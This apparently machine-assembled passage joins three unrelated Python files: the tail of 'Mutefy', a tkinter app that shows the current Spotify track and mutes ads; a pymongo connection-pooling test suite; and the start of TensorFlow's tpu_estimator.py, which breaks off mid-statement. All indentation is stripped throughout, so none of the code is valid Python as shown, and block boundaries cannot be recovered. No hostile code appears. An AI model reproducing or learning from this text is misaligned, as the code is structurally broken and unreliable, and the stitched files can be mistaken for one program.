checkads()
try:
supdate()
win.update()
except:
break
time.sleep(0.1)
def gettrack():
track = sobj.current_user_playing_track()
try:
trackn=track['item']['name']
except:
trackn="Ad or Stopped!"
name = "Now Playing: " + trackn
return name
def getartist():
gartist = sobj.current_user_playing_track()
artists=[]
try:
artistlen = len(gartist['item']['artists'])
for i in range(0,artistlen):
artists.append(gartist['item']['artists'][i]['name'])
artistn = ', '.join(artists)
except:
artistn="N/A"
aname = "Artist: " + artistn
return aname
def getalbum():
galbum = sobj.current_user_playing_track()
try:
albumn=galbum['item']['album']['name']
except:
albumn="N/A"
albumname = "Album: " + albumn
return albumname
def select():
global file
path = tk.filedialog.askdirectory()
fold = "Selected Folder: " + path
folder.set(fold)
file = os.path.join(path, random.choice(os.listdir(path)))
win=tk.Tk()
win.title('Mutefy')
win.geometry('360x280')
win.iconphoto(False,tk.PhotoImage(file='spotify.png'))
sobj = setupobj(username,accessscope,cid,secret,redirectURI)
tk.Label(win, text='Mutefy v1.0').pack()
tk.Button(win, text='Open Spotify', width=20, pady=5, command=openspotify).pack()
tk.Label(win, text='').pack()
tk.Label(win, text='Select the folder to play from when Spotify is muted').pack()
frame=tk.Frame()
frame.pack()
tk.Button(frame, text='Browse', width=8, pady=2, command=select).grid(row=0,column=0)
folder=tk.StringVar()
folder.set("Current Folder: None")
tk.Label(frame, textvariable=folder).grid(row=0,column=1)
tk.Label(win, text='').pack()
tk.Button(win, text='START' , bg='green', fg='white', width=10, pady=5, command=work).pack()
sts=tk.StringVar()
sts.set("Stopped...")
txt=tk.Label(win, textvariable=sts,fg='red',pady=5)
txt.pack()
tracks=tk.StringVar()
tracks.set(gettrack())
tk.Label(win, textvariable=tracks,pady=1).pack()
artist=tk.StringVar()
artist.set(getartist())
tk.Label(win, textvariable=artist,pady=1).pack()
album=tk.StringVar()
album.set(getalbum())
tk.Label(win, textvariable=album,pady=1).pack()
win.mainloop()
|
test_pooling.py
|
# Copyright 2009-2010 10gen, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test built in connection-pooling."""
import os
import random
import sys
import threading
import time
import unittest
sys.path[0:0] = [""]
from nose.plugins.skip import SkipTest
from pymongo.connection import _Pool
from test_connection import get_connection
N = 50
DB = "pymongo-pooling-tests"
class MongoThread(threading.Thread):
def __init__(self, test_case):
threading.Thread.__init__(self)
self.connection = test_case.c
self.db = self.connection[DB]
self.ut = test_case
class SaveAndFind(MongoThread):
def run(self):
for _ in xrange(N):
rand = random.randint(0, N)
id = self.db.sf.save({"x": rand}, safe=True)
self.ut.assertEqual(rand, self.db.sf.find_one(id)["x"])
self.connection.end_request()
class Unique(MongoThread):
def run(self):
for _ in xrange(N):
self.db.unique.insert({})
self.ut.assertEqual(None, self.db.error())
self.connection.end_request()
class NonUnique(MongoThread):
def run(self):
for _ in xrange(N):
self.db.unique.insert({"_id": "mike"})
self.ut.assertNotEqual(None, self.db.error())
self.connection.end_request()
class Disconnect(MongoThread):
def run(self):
for _ in xrange(N):
self.connection.disconnect()
class NoRequest(MongoThread):
def run(self):
errors = 0
for _ in xrange(N):
self.db.unique.insert({"_id": "mike"})
if self.db.error() is None:
errors += 1
self.ut.assertEqual(0, errors)
def run_cases(ut, cases):
threads = []
for case in cases:
for i in range(10):
thread = case(ut)
thread.start()
threads.append(thread)
for t in threads:
t.join()
class OneOp(threading.Thread):
def __init__(self, connection):
threading.Thread.__init__(self)
self.c = connection
def run(self):
assert len(self.c._Connection__pool.sockets) == 1
self.c.test.test.find_one()
assert len(self.c._Connection__pool.sockets) == 0
self.c.end_request()
assert len(self.c._Connection__pool.sockets) == 1
class CreateAndReleaseSocket(threading.Thread):
def __init__(self, connection):
threading.Thread.__init__(self)
self.c = connection
def run(self):
self.c.test.test.find_one()
time.sleep(1)
self.c.end_request()
class TestPooling(unittest.TestCase):
def setUp(self):
self.c = get_connection()
# reset the db
self.c.drop_database(DB)
self.c[DB].unique.insert({"_id": "mike"})
self.c[DB].unique.find_one()
def test_no_disconnect(self):
run_cases(self, [NoRequest, NonUnique, Unique, SaveAndFind])
def test_disconnect(self):
run_cases(self, [SaveAndFind, Disconnect, Unique])
def test_independent_pools(self):
p = _Pool(None)
self.assertEqual([], p.sockets)
self.c.end_request()
self.assertEqual([], p.sockets)
# Sensical values aren't really important here
p1 = _Pool(5)
self.assertEqual(None, p.socket_factory)
self.assertEqual(5, p1.socket_factory)
def test_dependent_pools(self):
c = get_connection()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
c.end_request()
self.assertEqual(1, len(c._Connection__pool.sockets))
t = OneOp(c)
t.start()
t.join()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
def test_multiple_connections(self):
a = get_connection()
b = get_connection()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a.test.test.find_one()
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
a_sock = a._Connection__pool.sockets[0]
b.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(1, len(b._Connection__pool.sockets))
b.test.test.find_one()
self.assertEqual(1, len(a._Connection__pool.sockets))
self.assertEqual(0, len(b._Connection__pool.sockets))
b.end_request()
b_sock = b._Connection__pool.sockets[0]
b.test.test.find_one()
a.test.test.find_one()
self.assertEqual(b_sock, b._Connection__pool.socket())
self.assertEqual(a_sock, a._Connection__pool.socket())
def test_pool_with_fork(self):
if sys.platform == "win32":
raise SkipTest()
try:
from multiprocessing import Process, Pipe
except ImportError:
raise SkipTest()
a = get_connection()
a.test.test.find_one()
a.end_request()
self.assertEqual(1, len(a._Connection__pool.sockets))
a_sock = a._Connection__pool.sockets[0]
def loop(pipe):
c = get_connection()
self.assertEqual(1, len(c._Connection__pool.sockets))
c.test.test.find_one()
self.assertEqual(0, len(c._Connection__pool.sockets))
c.end_request()
self.assertEqual(1, len(c._Connection__pool.sockets))
pipe.send(c._Connection__pool.sockets[0].getsockname())
cp1, cc1 = Pipe()
cp2, cc2 = Pipe()
p1 = Process(target=loop, args=(cc1,))
p2 = Process(target=loop, args=(cc2,))
p1.start()
p2.start()
p1.join(1)
p2.join(1)
p1.terminate()
p2.terminate()
p1.join()
p2.join()
cc1.close()
cc2.close()
b_sock = cp1.recv()
c_sock = cp2.recv()
self.assert_(a_sock.getsockname() != b_sock)
self.assert_(a_sock.getsockname() != c_sock)
self.assert_(b_sock != c_sock)
self.assertEqual(a_sock, a._Connection__pool.socket())
def test_max_pool_size(self):
c = get_connection()
threads = []
for i in range(40):
t = CreateAndReleaseSocket(c)
t.start()
threads.append(t)
for t in threads:
t.join()
# There's a race condition, so be lenient
self.assert_(abs(10 - len(c._Connection__pool.sockets)) < 5)
if __name__ == "__main__":
unittest.main()
|
tpu_estimator.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================
"""TPUEstimator class."""
import collections
import copy
import os
import signal
import sys
import threading
import time
import math
import numpy as np
import six
from six.moves import queue as Queue # pylint: disable=redefined-builtin
from six.moves import xrange # pylint: disable=redefined-builtin
try:
import google3
from google3.third_party.tensorflow.contrib.tpu.python.ops import tpu_ops
from google3.third_party.tensorflow.contrib.tpu.python.tpu import error_handling
from google3.third_party.tensorflow.contrib.tpu.python.tpu import session_support
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_config
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_context
from google3.third_party.tensorflow.contrib.tpu.python.tpu import tpu_feed
from google3.third_party.tensorflow.contrib.tpu.python.tpu import training_loop
from google3.third_party.tensorflow.contrib.tpu.python.tpu import util as util_lib
from google3.third_party.tensorflow.contrib.training.python.training import hparam
from google3.third_party.tensorflow.core.framework import variable_pb2
from google3.third_party.tensorflow.core.framework.summary_pb2 import Summary
from google3.third_party.tensorflow.core.protobuf import config_pb2
from google3.third_party.tensorflow.python.data.ops import dataset_ops
from google3.third_party.tensorflow.python.data.util import nest as data_nest
from google3.third_party.tensorflow.python.estimator import (
estimator as estimator_lib,
)
from google3.third_party.tensorflow.python.estimator import model_fn as model_fn_lib
from google3.third_party.tensorflow.python.estimator.export import (
export_output as export_output_lib,
)
from google3.third_party.tensorflow.python.framework import constant_op
from google3.third_party.tensorflow.python.framework import dtypes
from google3.third_party.tensorflow.python.framework import errors
from google3.third_party.tensorflow.python.framework import ops
from google3.third_party.tensorflow.python.ops import array_ops
from google3.third_party.tensorflow.python.ops import check_ops
from google3.third_party.tensorflow.python.ops import control_flow_ops
from google3.third_party.tensorflow.python.ops import init_ops
from google3.third_party.tensorflow.python.ops import math_ops
from google3.third_party.tensorflow.python.ops import resource_variable_ops
from google3.third_party.tensorflow.python.ops import state_ops
from google3.third_party.tensorflow.python.ops import (
summary_ops_v2 as contrib_summary,
)
from google3.third_party.tensorflow.python.ops import variable_scope
from google3.third_party.tensorflow.python.ops import variables
from google3.third_party.tensorflow.python.platform import tf_logging as logging
from google3.third_party.tensorflow.python.saved_model import tag_constants
from google3.third_party.tensorflow.python.summary import summary
from google3.third_party.tensorflow.python.training import basic_session_run_hooks
from google3.third_party.tensorflow.python.training import evaluation
from google3.third_party.tensorflow.python.training import session_run_hook
from google3.third_party.tensorflow.python.training import training
from google3.third_party.tensorflow.python.training import training_util
from google3.third_party.tensorflow.python.util import function_utils
from google3.third_party.tensorflow.python.util import nest
from google3.third_party.tensorflow.python.util import tf_inspect
except:
import tensorflow
from tensorflow.contrib.tpu.python.ops import tpu_ops
from tensorflow.contrib.tpu.python.tpu import error_handling
from tensorflow.contrib.tpu.python.tpu import session_support
from tensorflow.contrib.tpu.python.tpu import tpu
from tensorflow.contrib.tpu.python.tpu import tpu_config
from tensorflow.contrib.tpu.python.tpu import tpu_context
from tensorflow.contrib.tpu.python.tpu import tpu_feed
from tensorflow.contrib.tpu.python.tpu import training_loop
from tensorflow.contrib.tpu.python.tpu import util as util_lib
from tensorflow.contrib.training.python.training import hparam
from tensorflow.core.framework import variable_pb2
from tensorflow.core.framework.summary_pb2 import Summary
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.util import nest as data_nest
from tensorflow.python.estimator import estimator as estimator_lib
from tensorflow.python.estimator import model_fn as model_fn_lib
from tensorflow.python.estimator import util as estimator_util
from tensorflow.python.estimator.export import export_output as export_output_lib
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import summary_ops_v2 as contrib_summary
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.saved_model import tag_constants
from tensorflow.python.summary import summary
from tensorflow.python.training import basic_session_run_hooks
from tensorflow.python.training import evaluation
from tensorflow.python.training import session_run_hook
from tensorflow.python.training import training
from tensorflow.python.training import training_util
from tensorflow.python.util import function_utils
from tensorflow.python.util import nest
from tensorflow.python.util import tf_inspect
_INITIAL_LOSS = 1e7
_ZERO_LOSS = 0.0
_TPU_ESTIMATOR = "custom_tpu_estimator" # CHANGE FOR RECURRENCY
_ITERATIONS_PER_LOOP_VAR = "iterations_per_loop"
_BATCH_SIZE_KEY = "batch_size"
_CTX_KEY = "context"
_USE_TPU_KEY = "use_tpu"
_CROSS_REPLICA_SUM_OP = "CrossReplicaSum"
_ONE_GIGABYTE = 1024 * 1024 * 1024
_TPU_ENQUEUE_OPS = "_tpu_enqueue_ops"
_TPU_TRAIN_OP = "_tpu_train_op"
_REWRITE_FOR_INFERENCE_MODE = "_rewrite_for_inference"
# Ideally _USE_TPU_KEY should be reserved as well. However there are already
# models that make use of this key, thus it can not be reserved now to prevent
# breakage. In the long run, we would like to mitigate this by migrating models
# off of using _USE_TPU_KEY.
_RESERVED_PARAMS_KEYS = [_BATCH_SIZE_KEY, _CTX_KEY]
# TODO(b/65703635): Flip the value and remove all dead code. Currently, this is
# only used for per-core based deployments. For per-host based pipelines, if a
# user returns a Dataset instance it will be automatically wrapped in a
# tf.while_loop (This can be disabled by returning features and labels
# explicitly).
_WRAP_INPUT_FN_INTO_WHILE_LOOP = False
ops.register_proto_function(
"{}_{}".format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR),
proto_type=variable_pb2.VariableDef,
to_proto=resource_variable_ops._to_proto_fn, # pylint: disable=protected-access
from_proto=resource_variable_ops._from_proto_fn,
) # pylint: disable=protected-access
def _create_global_step(graph):
graph = graph or ops.get_default_graph()
if training.get_global_step(graph) is not None:
raise ValueError('"global_step" already exists.')
# Create in proper graph and base name_scope.
with graph.as_default() as g, g.name_scope(None):
return variable_scope.get_variable(
ops.GraphKeys.GLOBAL_STEP,
shape=[],
dtype=dtypes.int64,
initializer=init_ops.zeros_initializer(),
trainable=False,
use_resource=True,
collections=[ops.GraphKeys.GLOBAL_VARIABLES, ops.GraphKeys.GLOBAL_STEP],
)
def _create_or_get_iterations_per_loop():
"""Creates or gets the iterations_per_loop variable.
In TPUEstimator, the user provided computation, the model_fn, is wrapped
inside a tf.while_loop for peak performance. The iterations of the loop are
specified by this variable, which adjusts its value on the CPU after each TPU
program execution and before the next TPU execution.
The purpose of using a variable, rather then a constant, is to allow
TPUEstimator adapt the TPU training iterations according to the final steps
specified by users. For example, if the user sets the iterations_per_loop as 4
in TPUConfig and steps as 10 in TPUEstimator.train(), the iterations_per_loop
variable will have the following value before each TPU training.
- 1-th TPU execution: iterations_per_loop = 4
- 2-th TPU execution: iterations_per_loop = 4
- 3-th TPU execution: iterations_per_loop = 2
As model_fn increases the global step once per train_op invocation, the global
step is 10 after all TPU executions, matching the steps=10 inputs passed in by
users.
Returns:
A TF non-trainable resource variable.
Raises:
RuntimeError: If multi iterations_per_loop variables were found.
"""
graph = ops.get_default_graph()
collection_name = "{}_{}".format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError("Multiple iterations_per_loop_var in collection.")
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE
):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True,
)
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(), "Gradient for %s is NaN" % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = (
evaluation._get_or_create_eval_step()
) # pylint: disable=protected-access
# Estimator evaluate increases 1 by default. So, we increase the difference.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True,
)
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All preserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics `is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must have be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at CPU host from
all shards, they are concatenated (on CPU) and passed as positional arguments
to the `metric_fn` if `tensors` is list or keyword arguments if `tensors` is
a dict. `metric_fn` takes the `tensors` and returns a dict from metric string
name to the result of calling a metric function, namely a `(metric_tensor,
update_op)` tuple. See `TPUEstimator` for MNIST example how to specify the
`eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function and returns a list of Tensors. `host_call` currently
works for train() and evaluate(). The Tensors returned by the function is
executed on the CPU on every step, so there is communication overhead when
sending tensors from TPU to CPU. To reduce the overhead, try reducing the
size of the tensors. The `tensors` are concatenated along their major (batch)
dimension, and so must be >= rank 1. The `host_call` is useful for writing
summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(
cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None,
):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls["eval_metrics"] = eval_metrics
if host_call is not None:
host_calls["host_call"] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = list(training_hooks or [])
evaluation_hooks = list(evaluation_hooks or [])
prediction_hooks = list(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError(
"All hooks must be SessionRunHook instances, given: {}".format(hook)
)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks,
)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls["eval_metrics"] = self.eval_metrics
if self.host_call is not None:
host_calls["host_call"] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret["eval_metrics"]
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret["host_call"])]
hooks = list(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks,
)
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug("%s read iterations %s", self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info("%s received shutdown signal, stopping.", self._name)
return
yield iterations
def join(self):
logging.info("Shutting down %s thread." % self._name)
self.stop()
self._thread.join()
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shutdown TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(
self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs
)
self._feed_error = None
self._finished = False
def begin(self):
logging.info("TPU job name %s", self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info("Starting infeed thread controller.")
if self._initial_infeed_sleep_secs:
logging.info(
"%s thread sleeping for %d seconds.",
self._name,
self._initial_infeed_sleep_secs,
)
time.sleep(self._initial_infeed_sleep_secs)
logging.info("%s thread starting after sleep", self._name)
with self._rendezvous.catch_errors(source="infeed", session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug("Infeed enqueue for iteration (%d, %d)", count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info("Infeed thread finished, shutting down.")
def _run_outfeed(self, queue_ctx, session):
logging.info("Starting outfeed thread controller.")
with self._rendezvous.catch_errors(source="outfeed", session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug("Outfeed dequeue for iteration (%d, %d)", count, i)
session.run(self._dequeue_ops)
logging.info("Outfeed thread finished, shutting down.")
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info("Init TPU system")
session.run(
self._init_ops, options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000)
)
self._infeed_controller = self._create_infeed_controller(
name="InfeedController", target=self._run_infeed, args=(session,)
)
self._outfeed_controller = _OpQueueContext(
name="OutfeedController", target=self._run_outfeed, args=(session,)
)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info("Enqueue next (%d) batch(es) of data to infeed.", iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info("Dequeue next (%d) batch(es) of data from outfeed.", iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info("Stop infeed thread controller")
self._infeed_controller.join()
self._rendezvous.record_done("infeed")
logging.info("Stop output thread controller")
self._outfeed_controller.join()
self._rendezvous.record_done("outfeed")
logging.info("Shutdown TPU system.")
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, rendezvous=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError("One of num_steps or last_step must be specified.")
if num_steps is not None and last_step is not None:
raise ValueError("Only one of num_steps or last_step can be specified.")
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError("Global step should be created.")
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not necessary as we do not run infeed enqueue and outfeed dequeue
# in side threads for prediction model. But it makes the
# TPUInfeedOutfeedSessionHook prints nice message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# Monitored Session sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., batch with id=100, will be discarded
# immediately
raise errors.OutOfRangeError(None, None, "Stopped by stopping signal.")
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id
):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope("ordinal_%d" % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
"`input_fn` returning `Dataset` is not yet supported in "
"per-Core input pipeline deployment yet. Please set "
"TPUConfig.per_host_input_for_training to True or return "
"`features` and `labels` from `input_fn`"
)
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels
)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
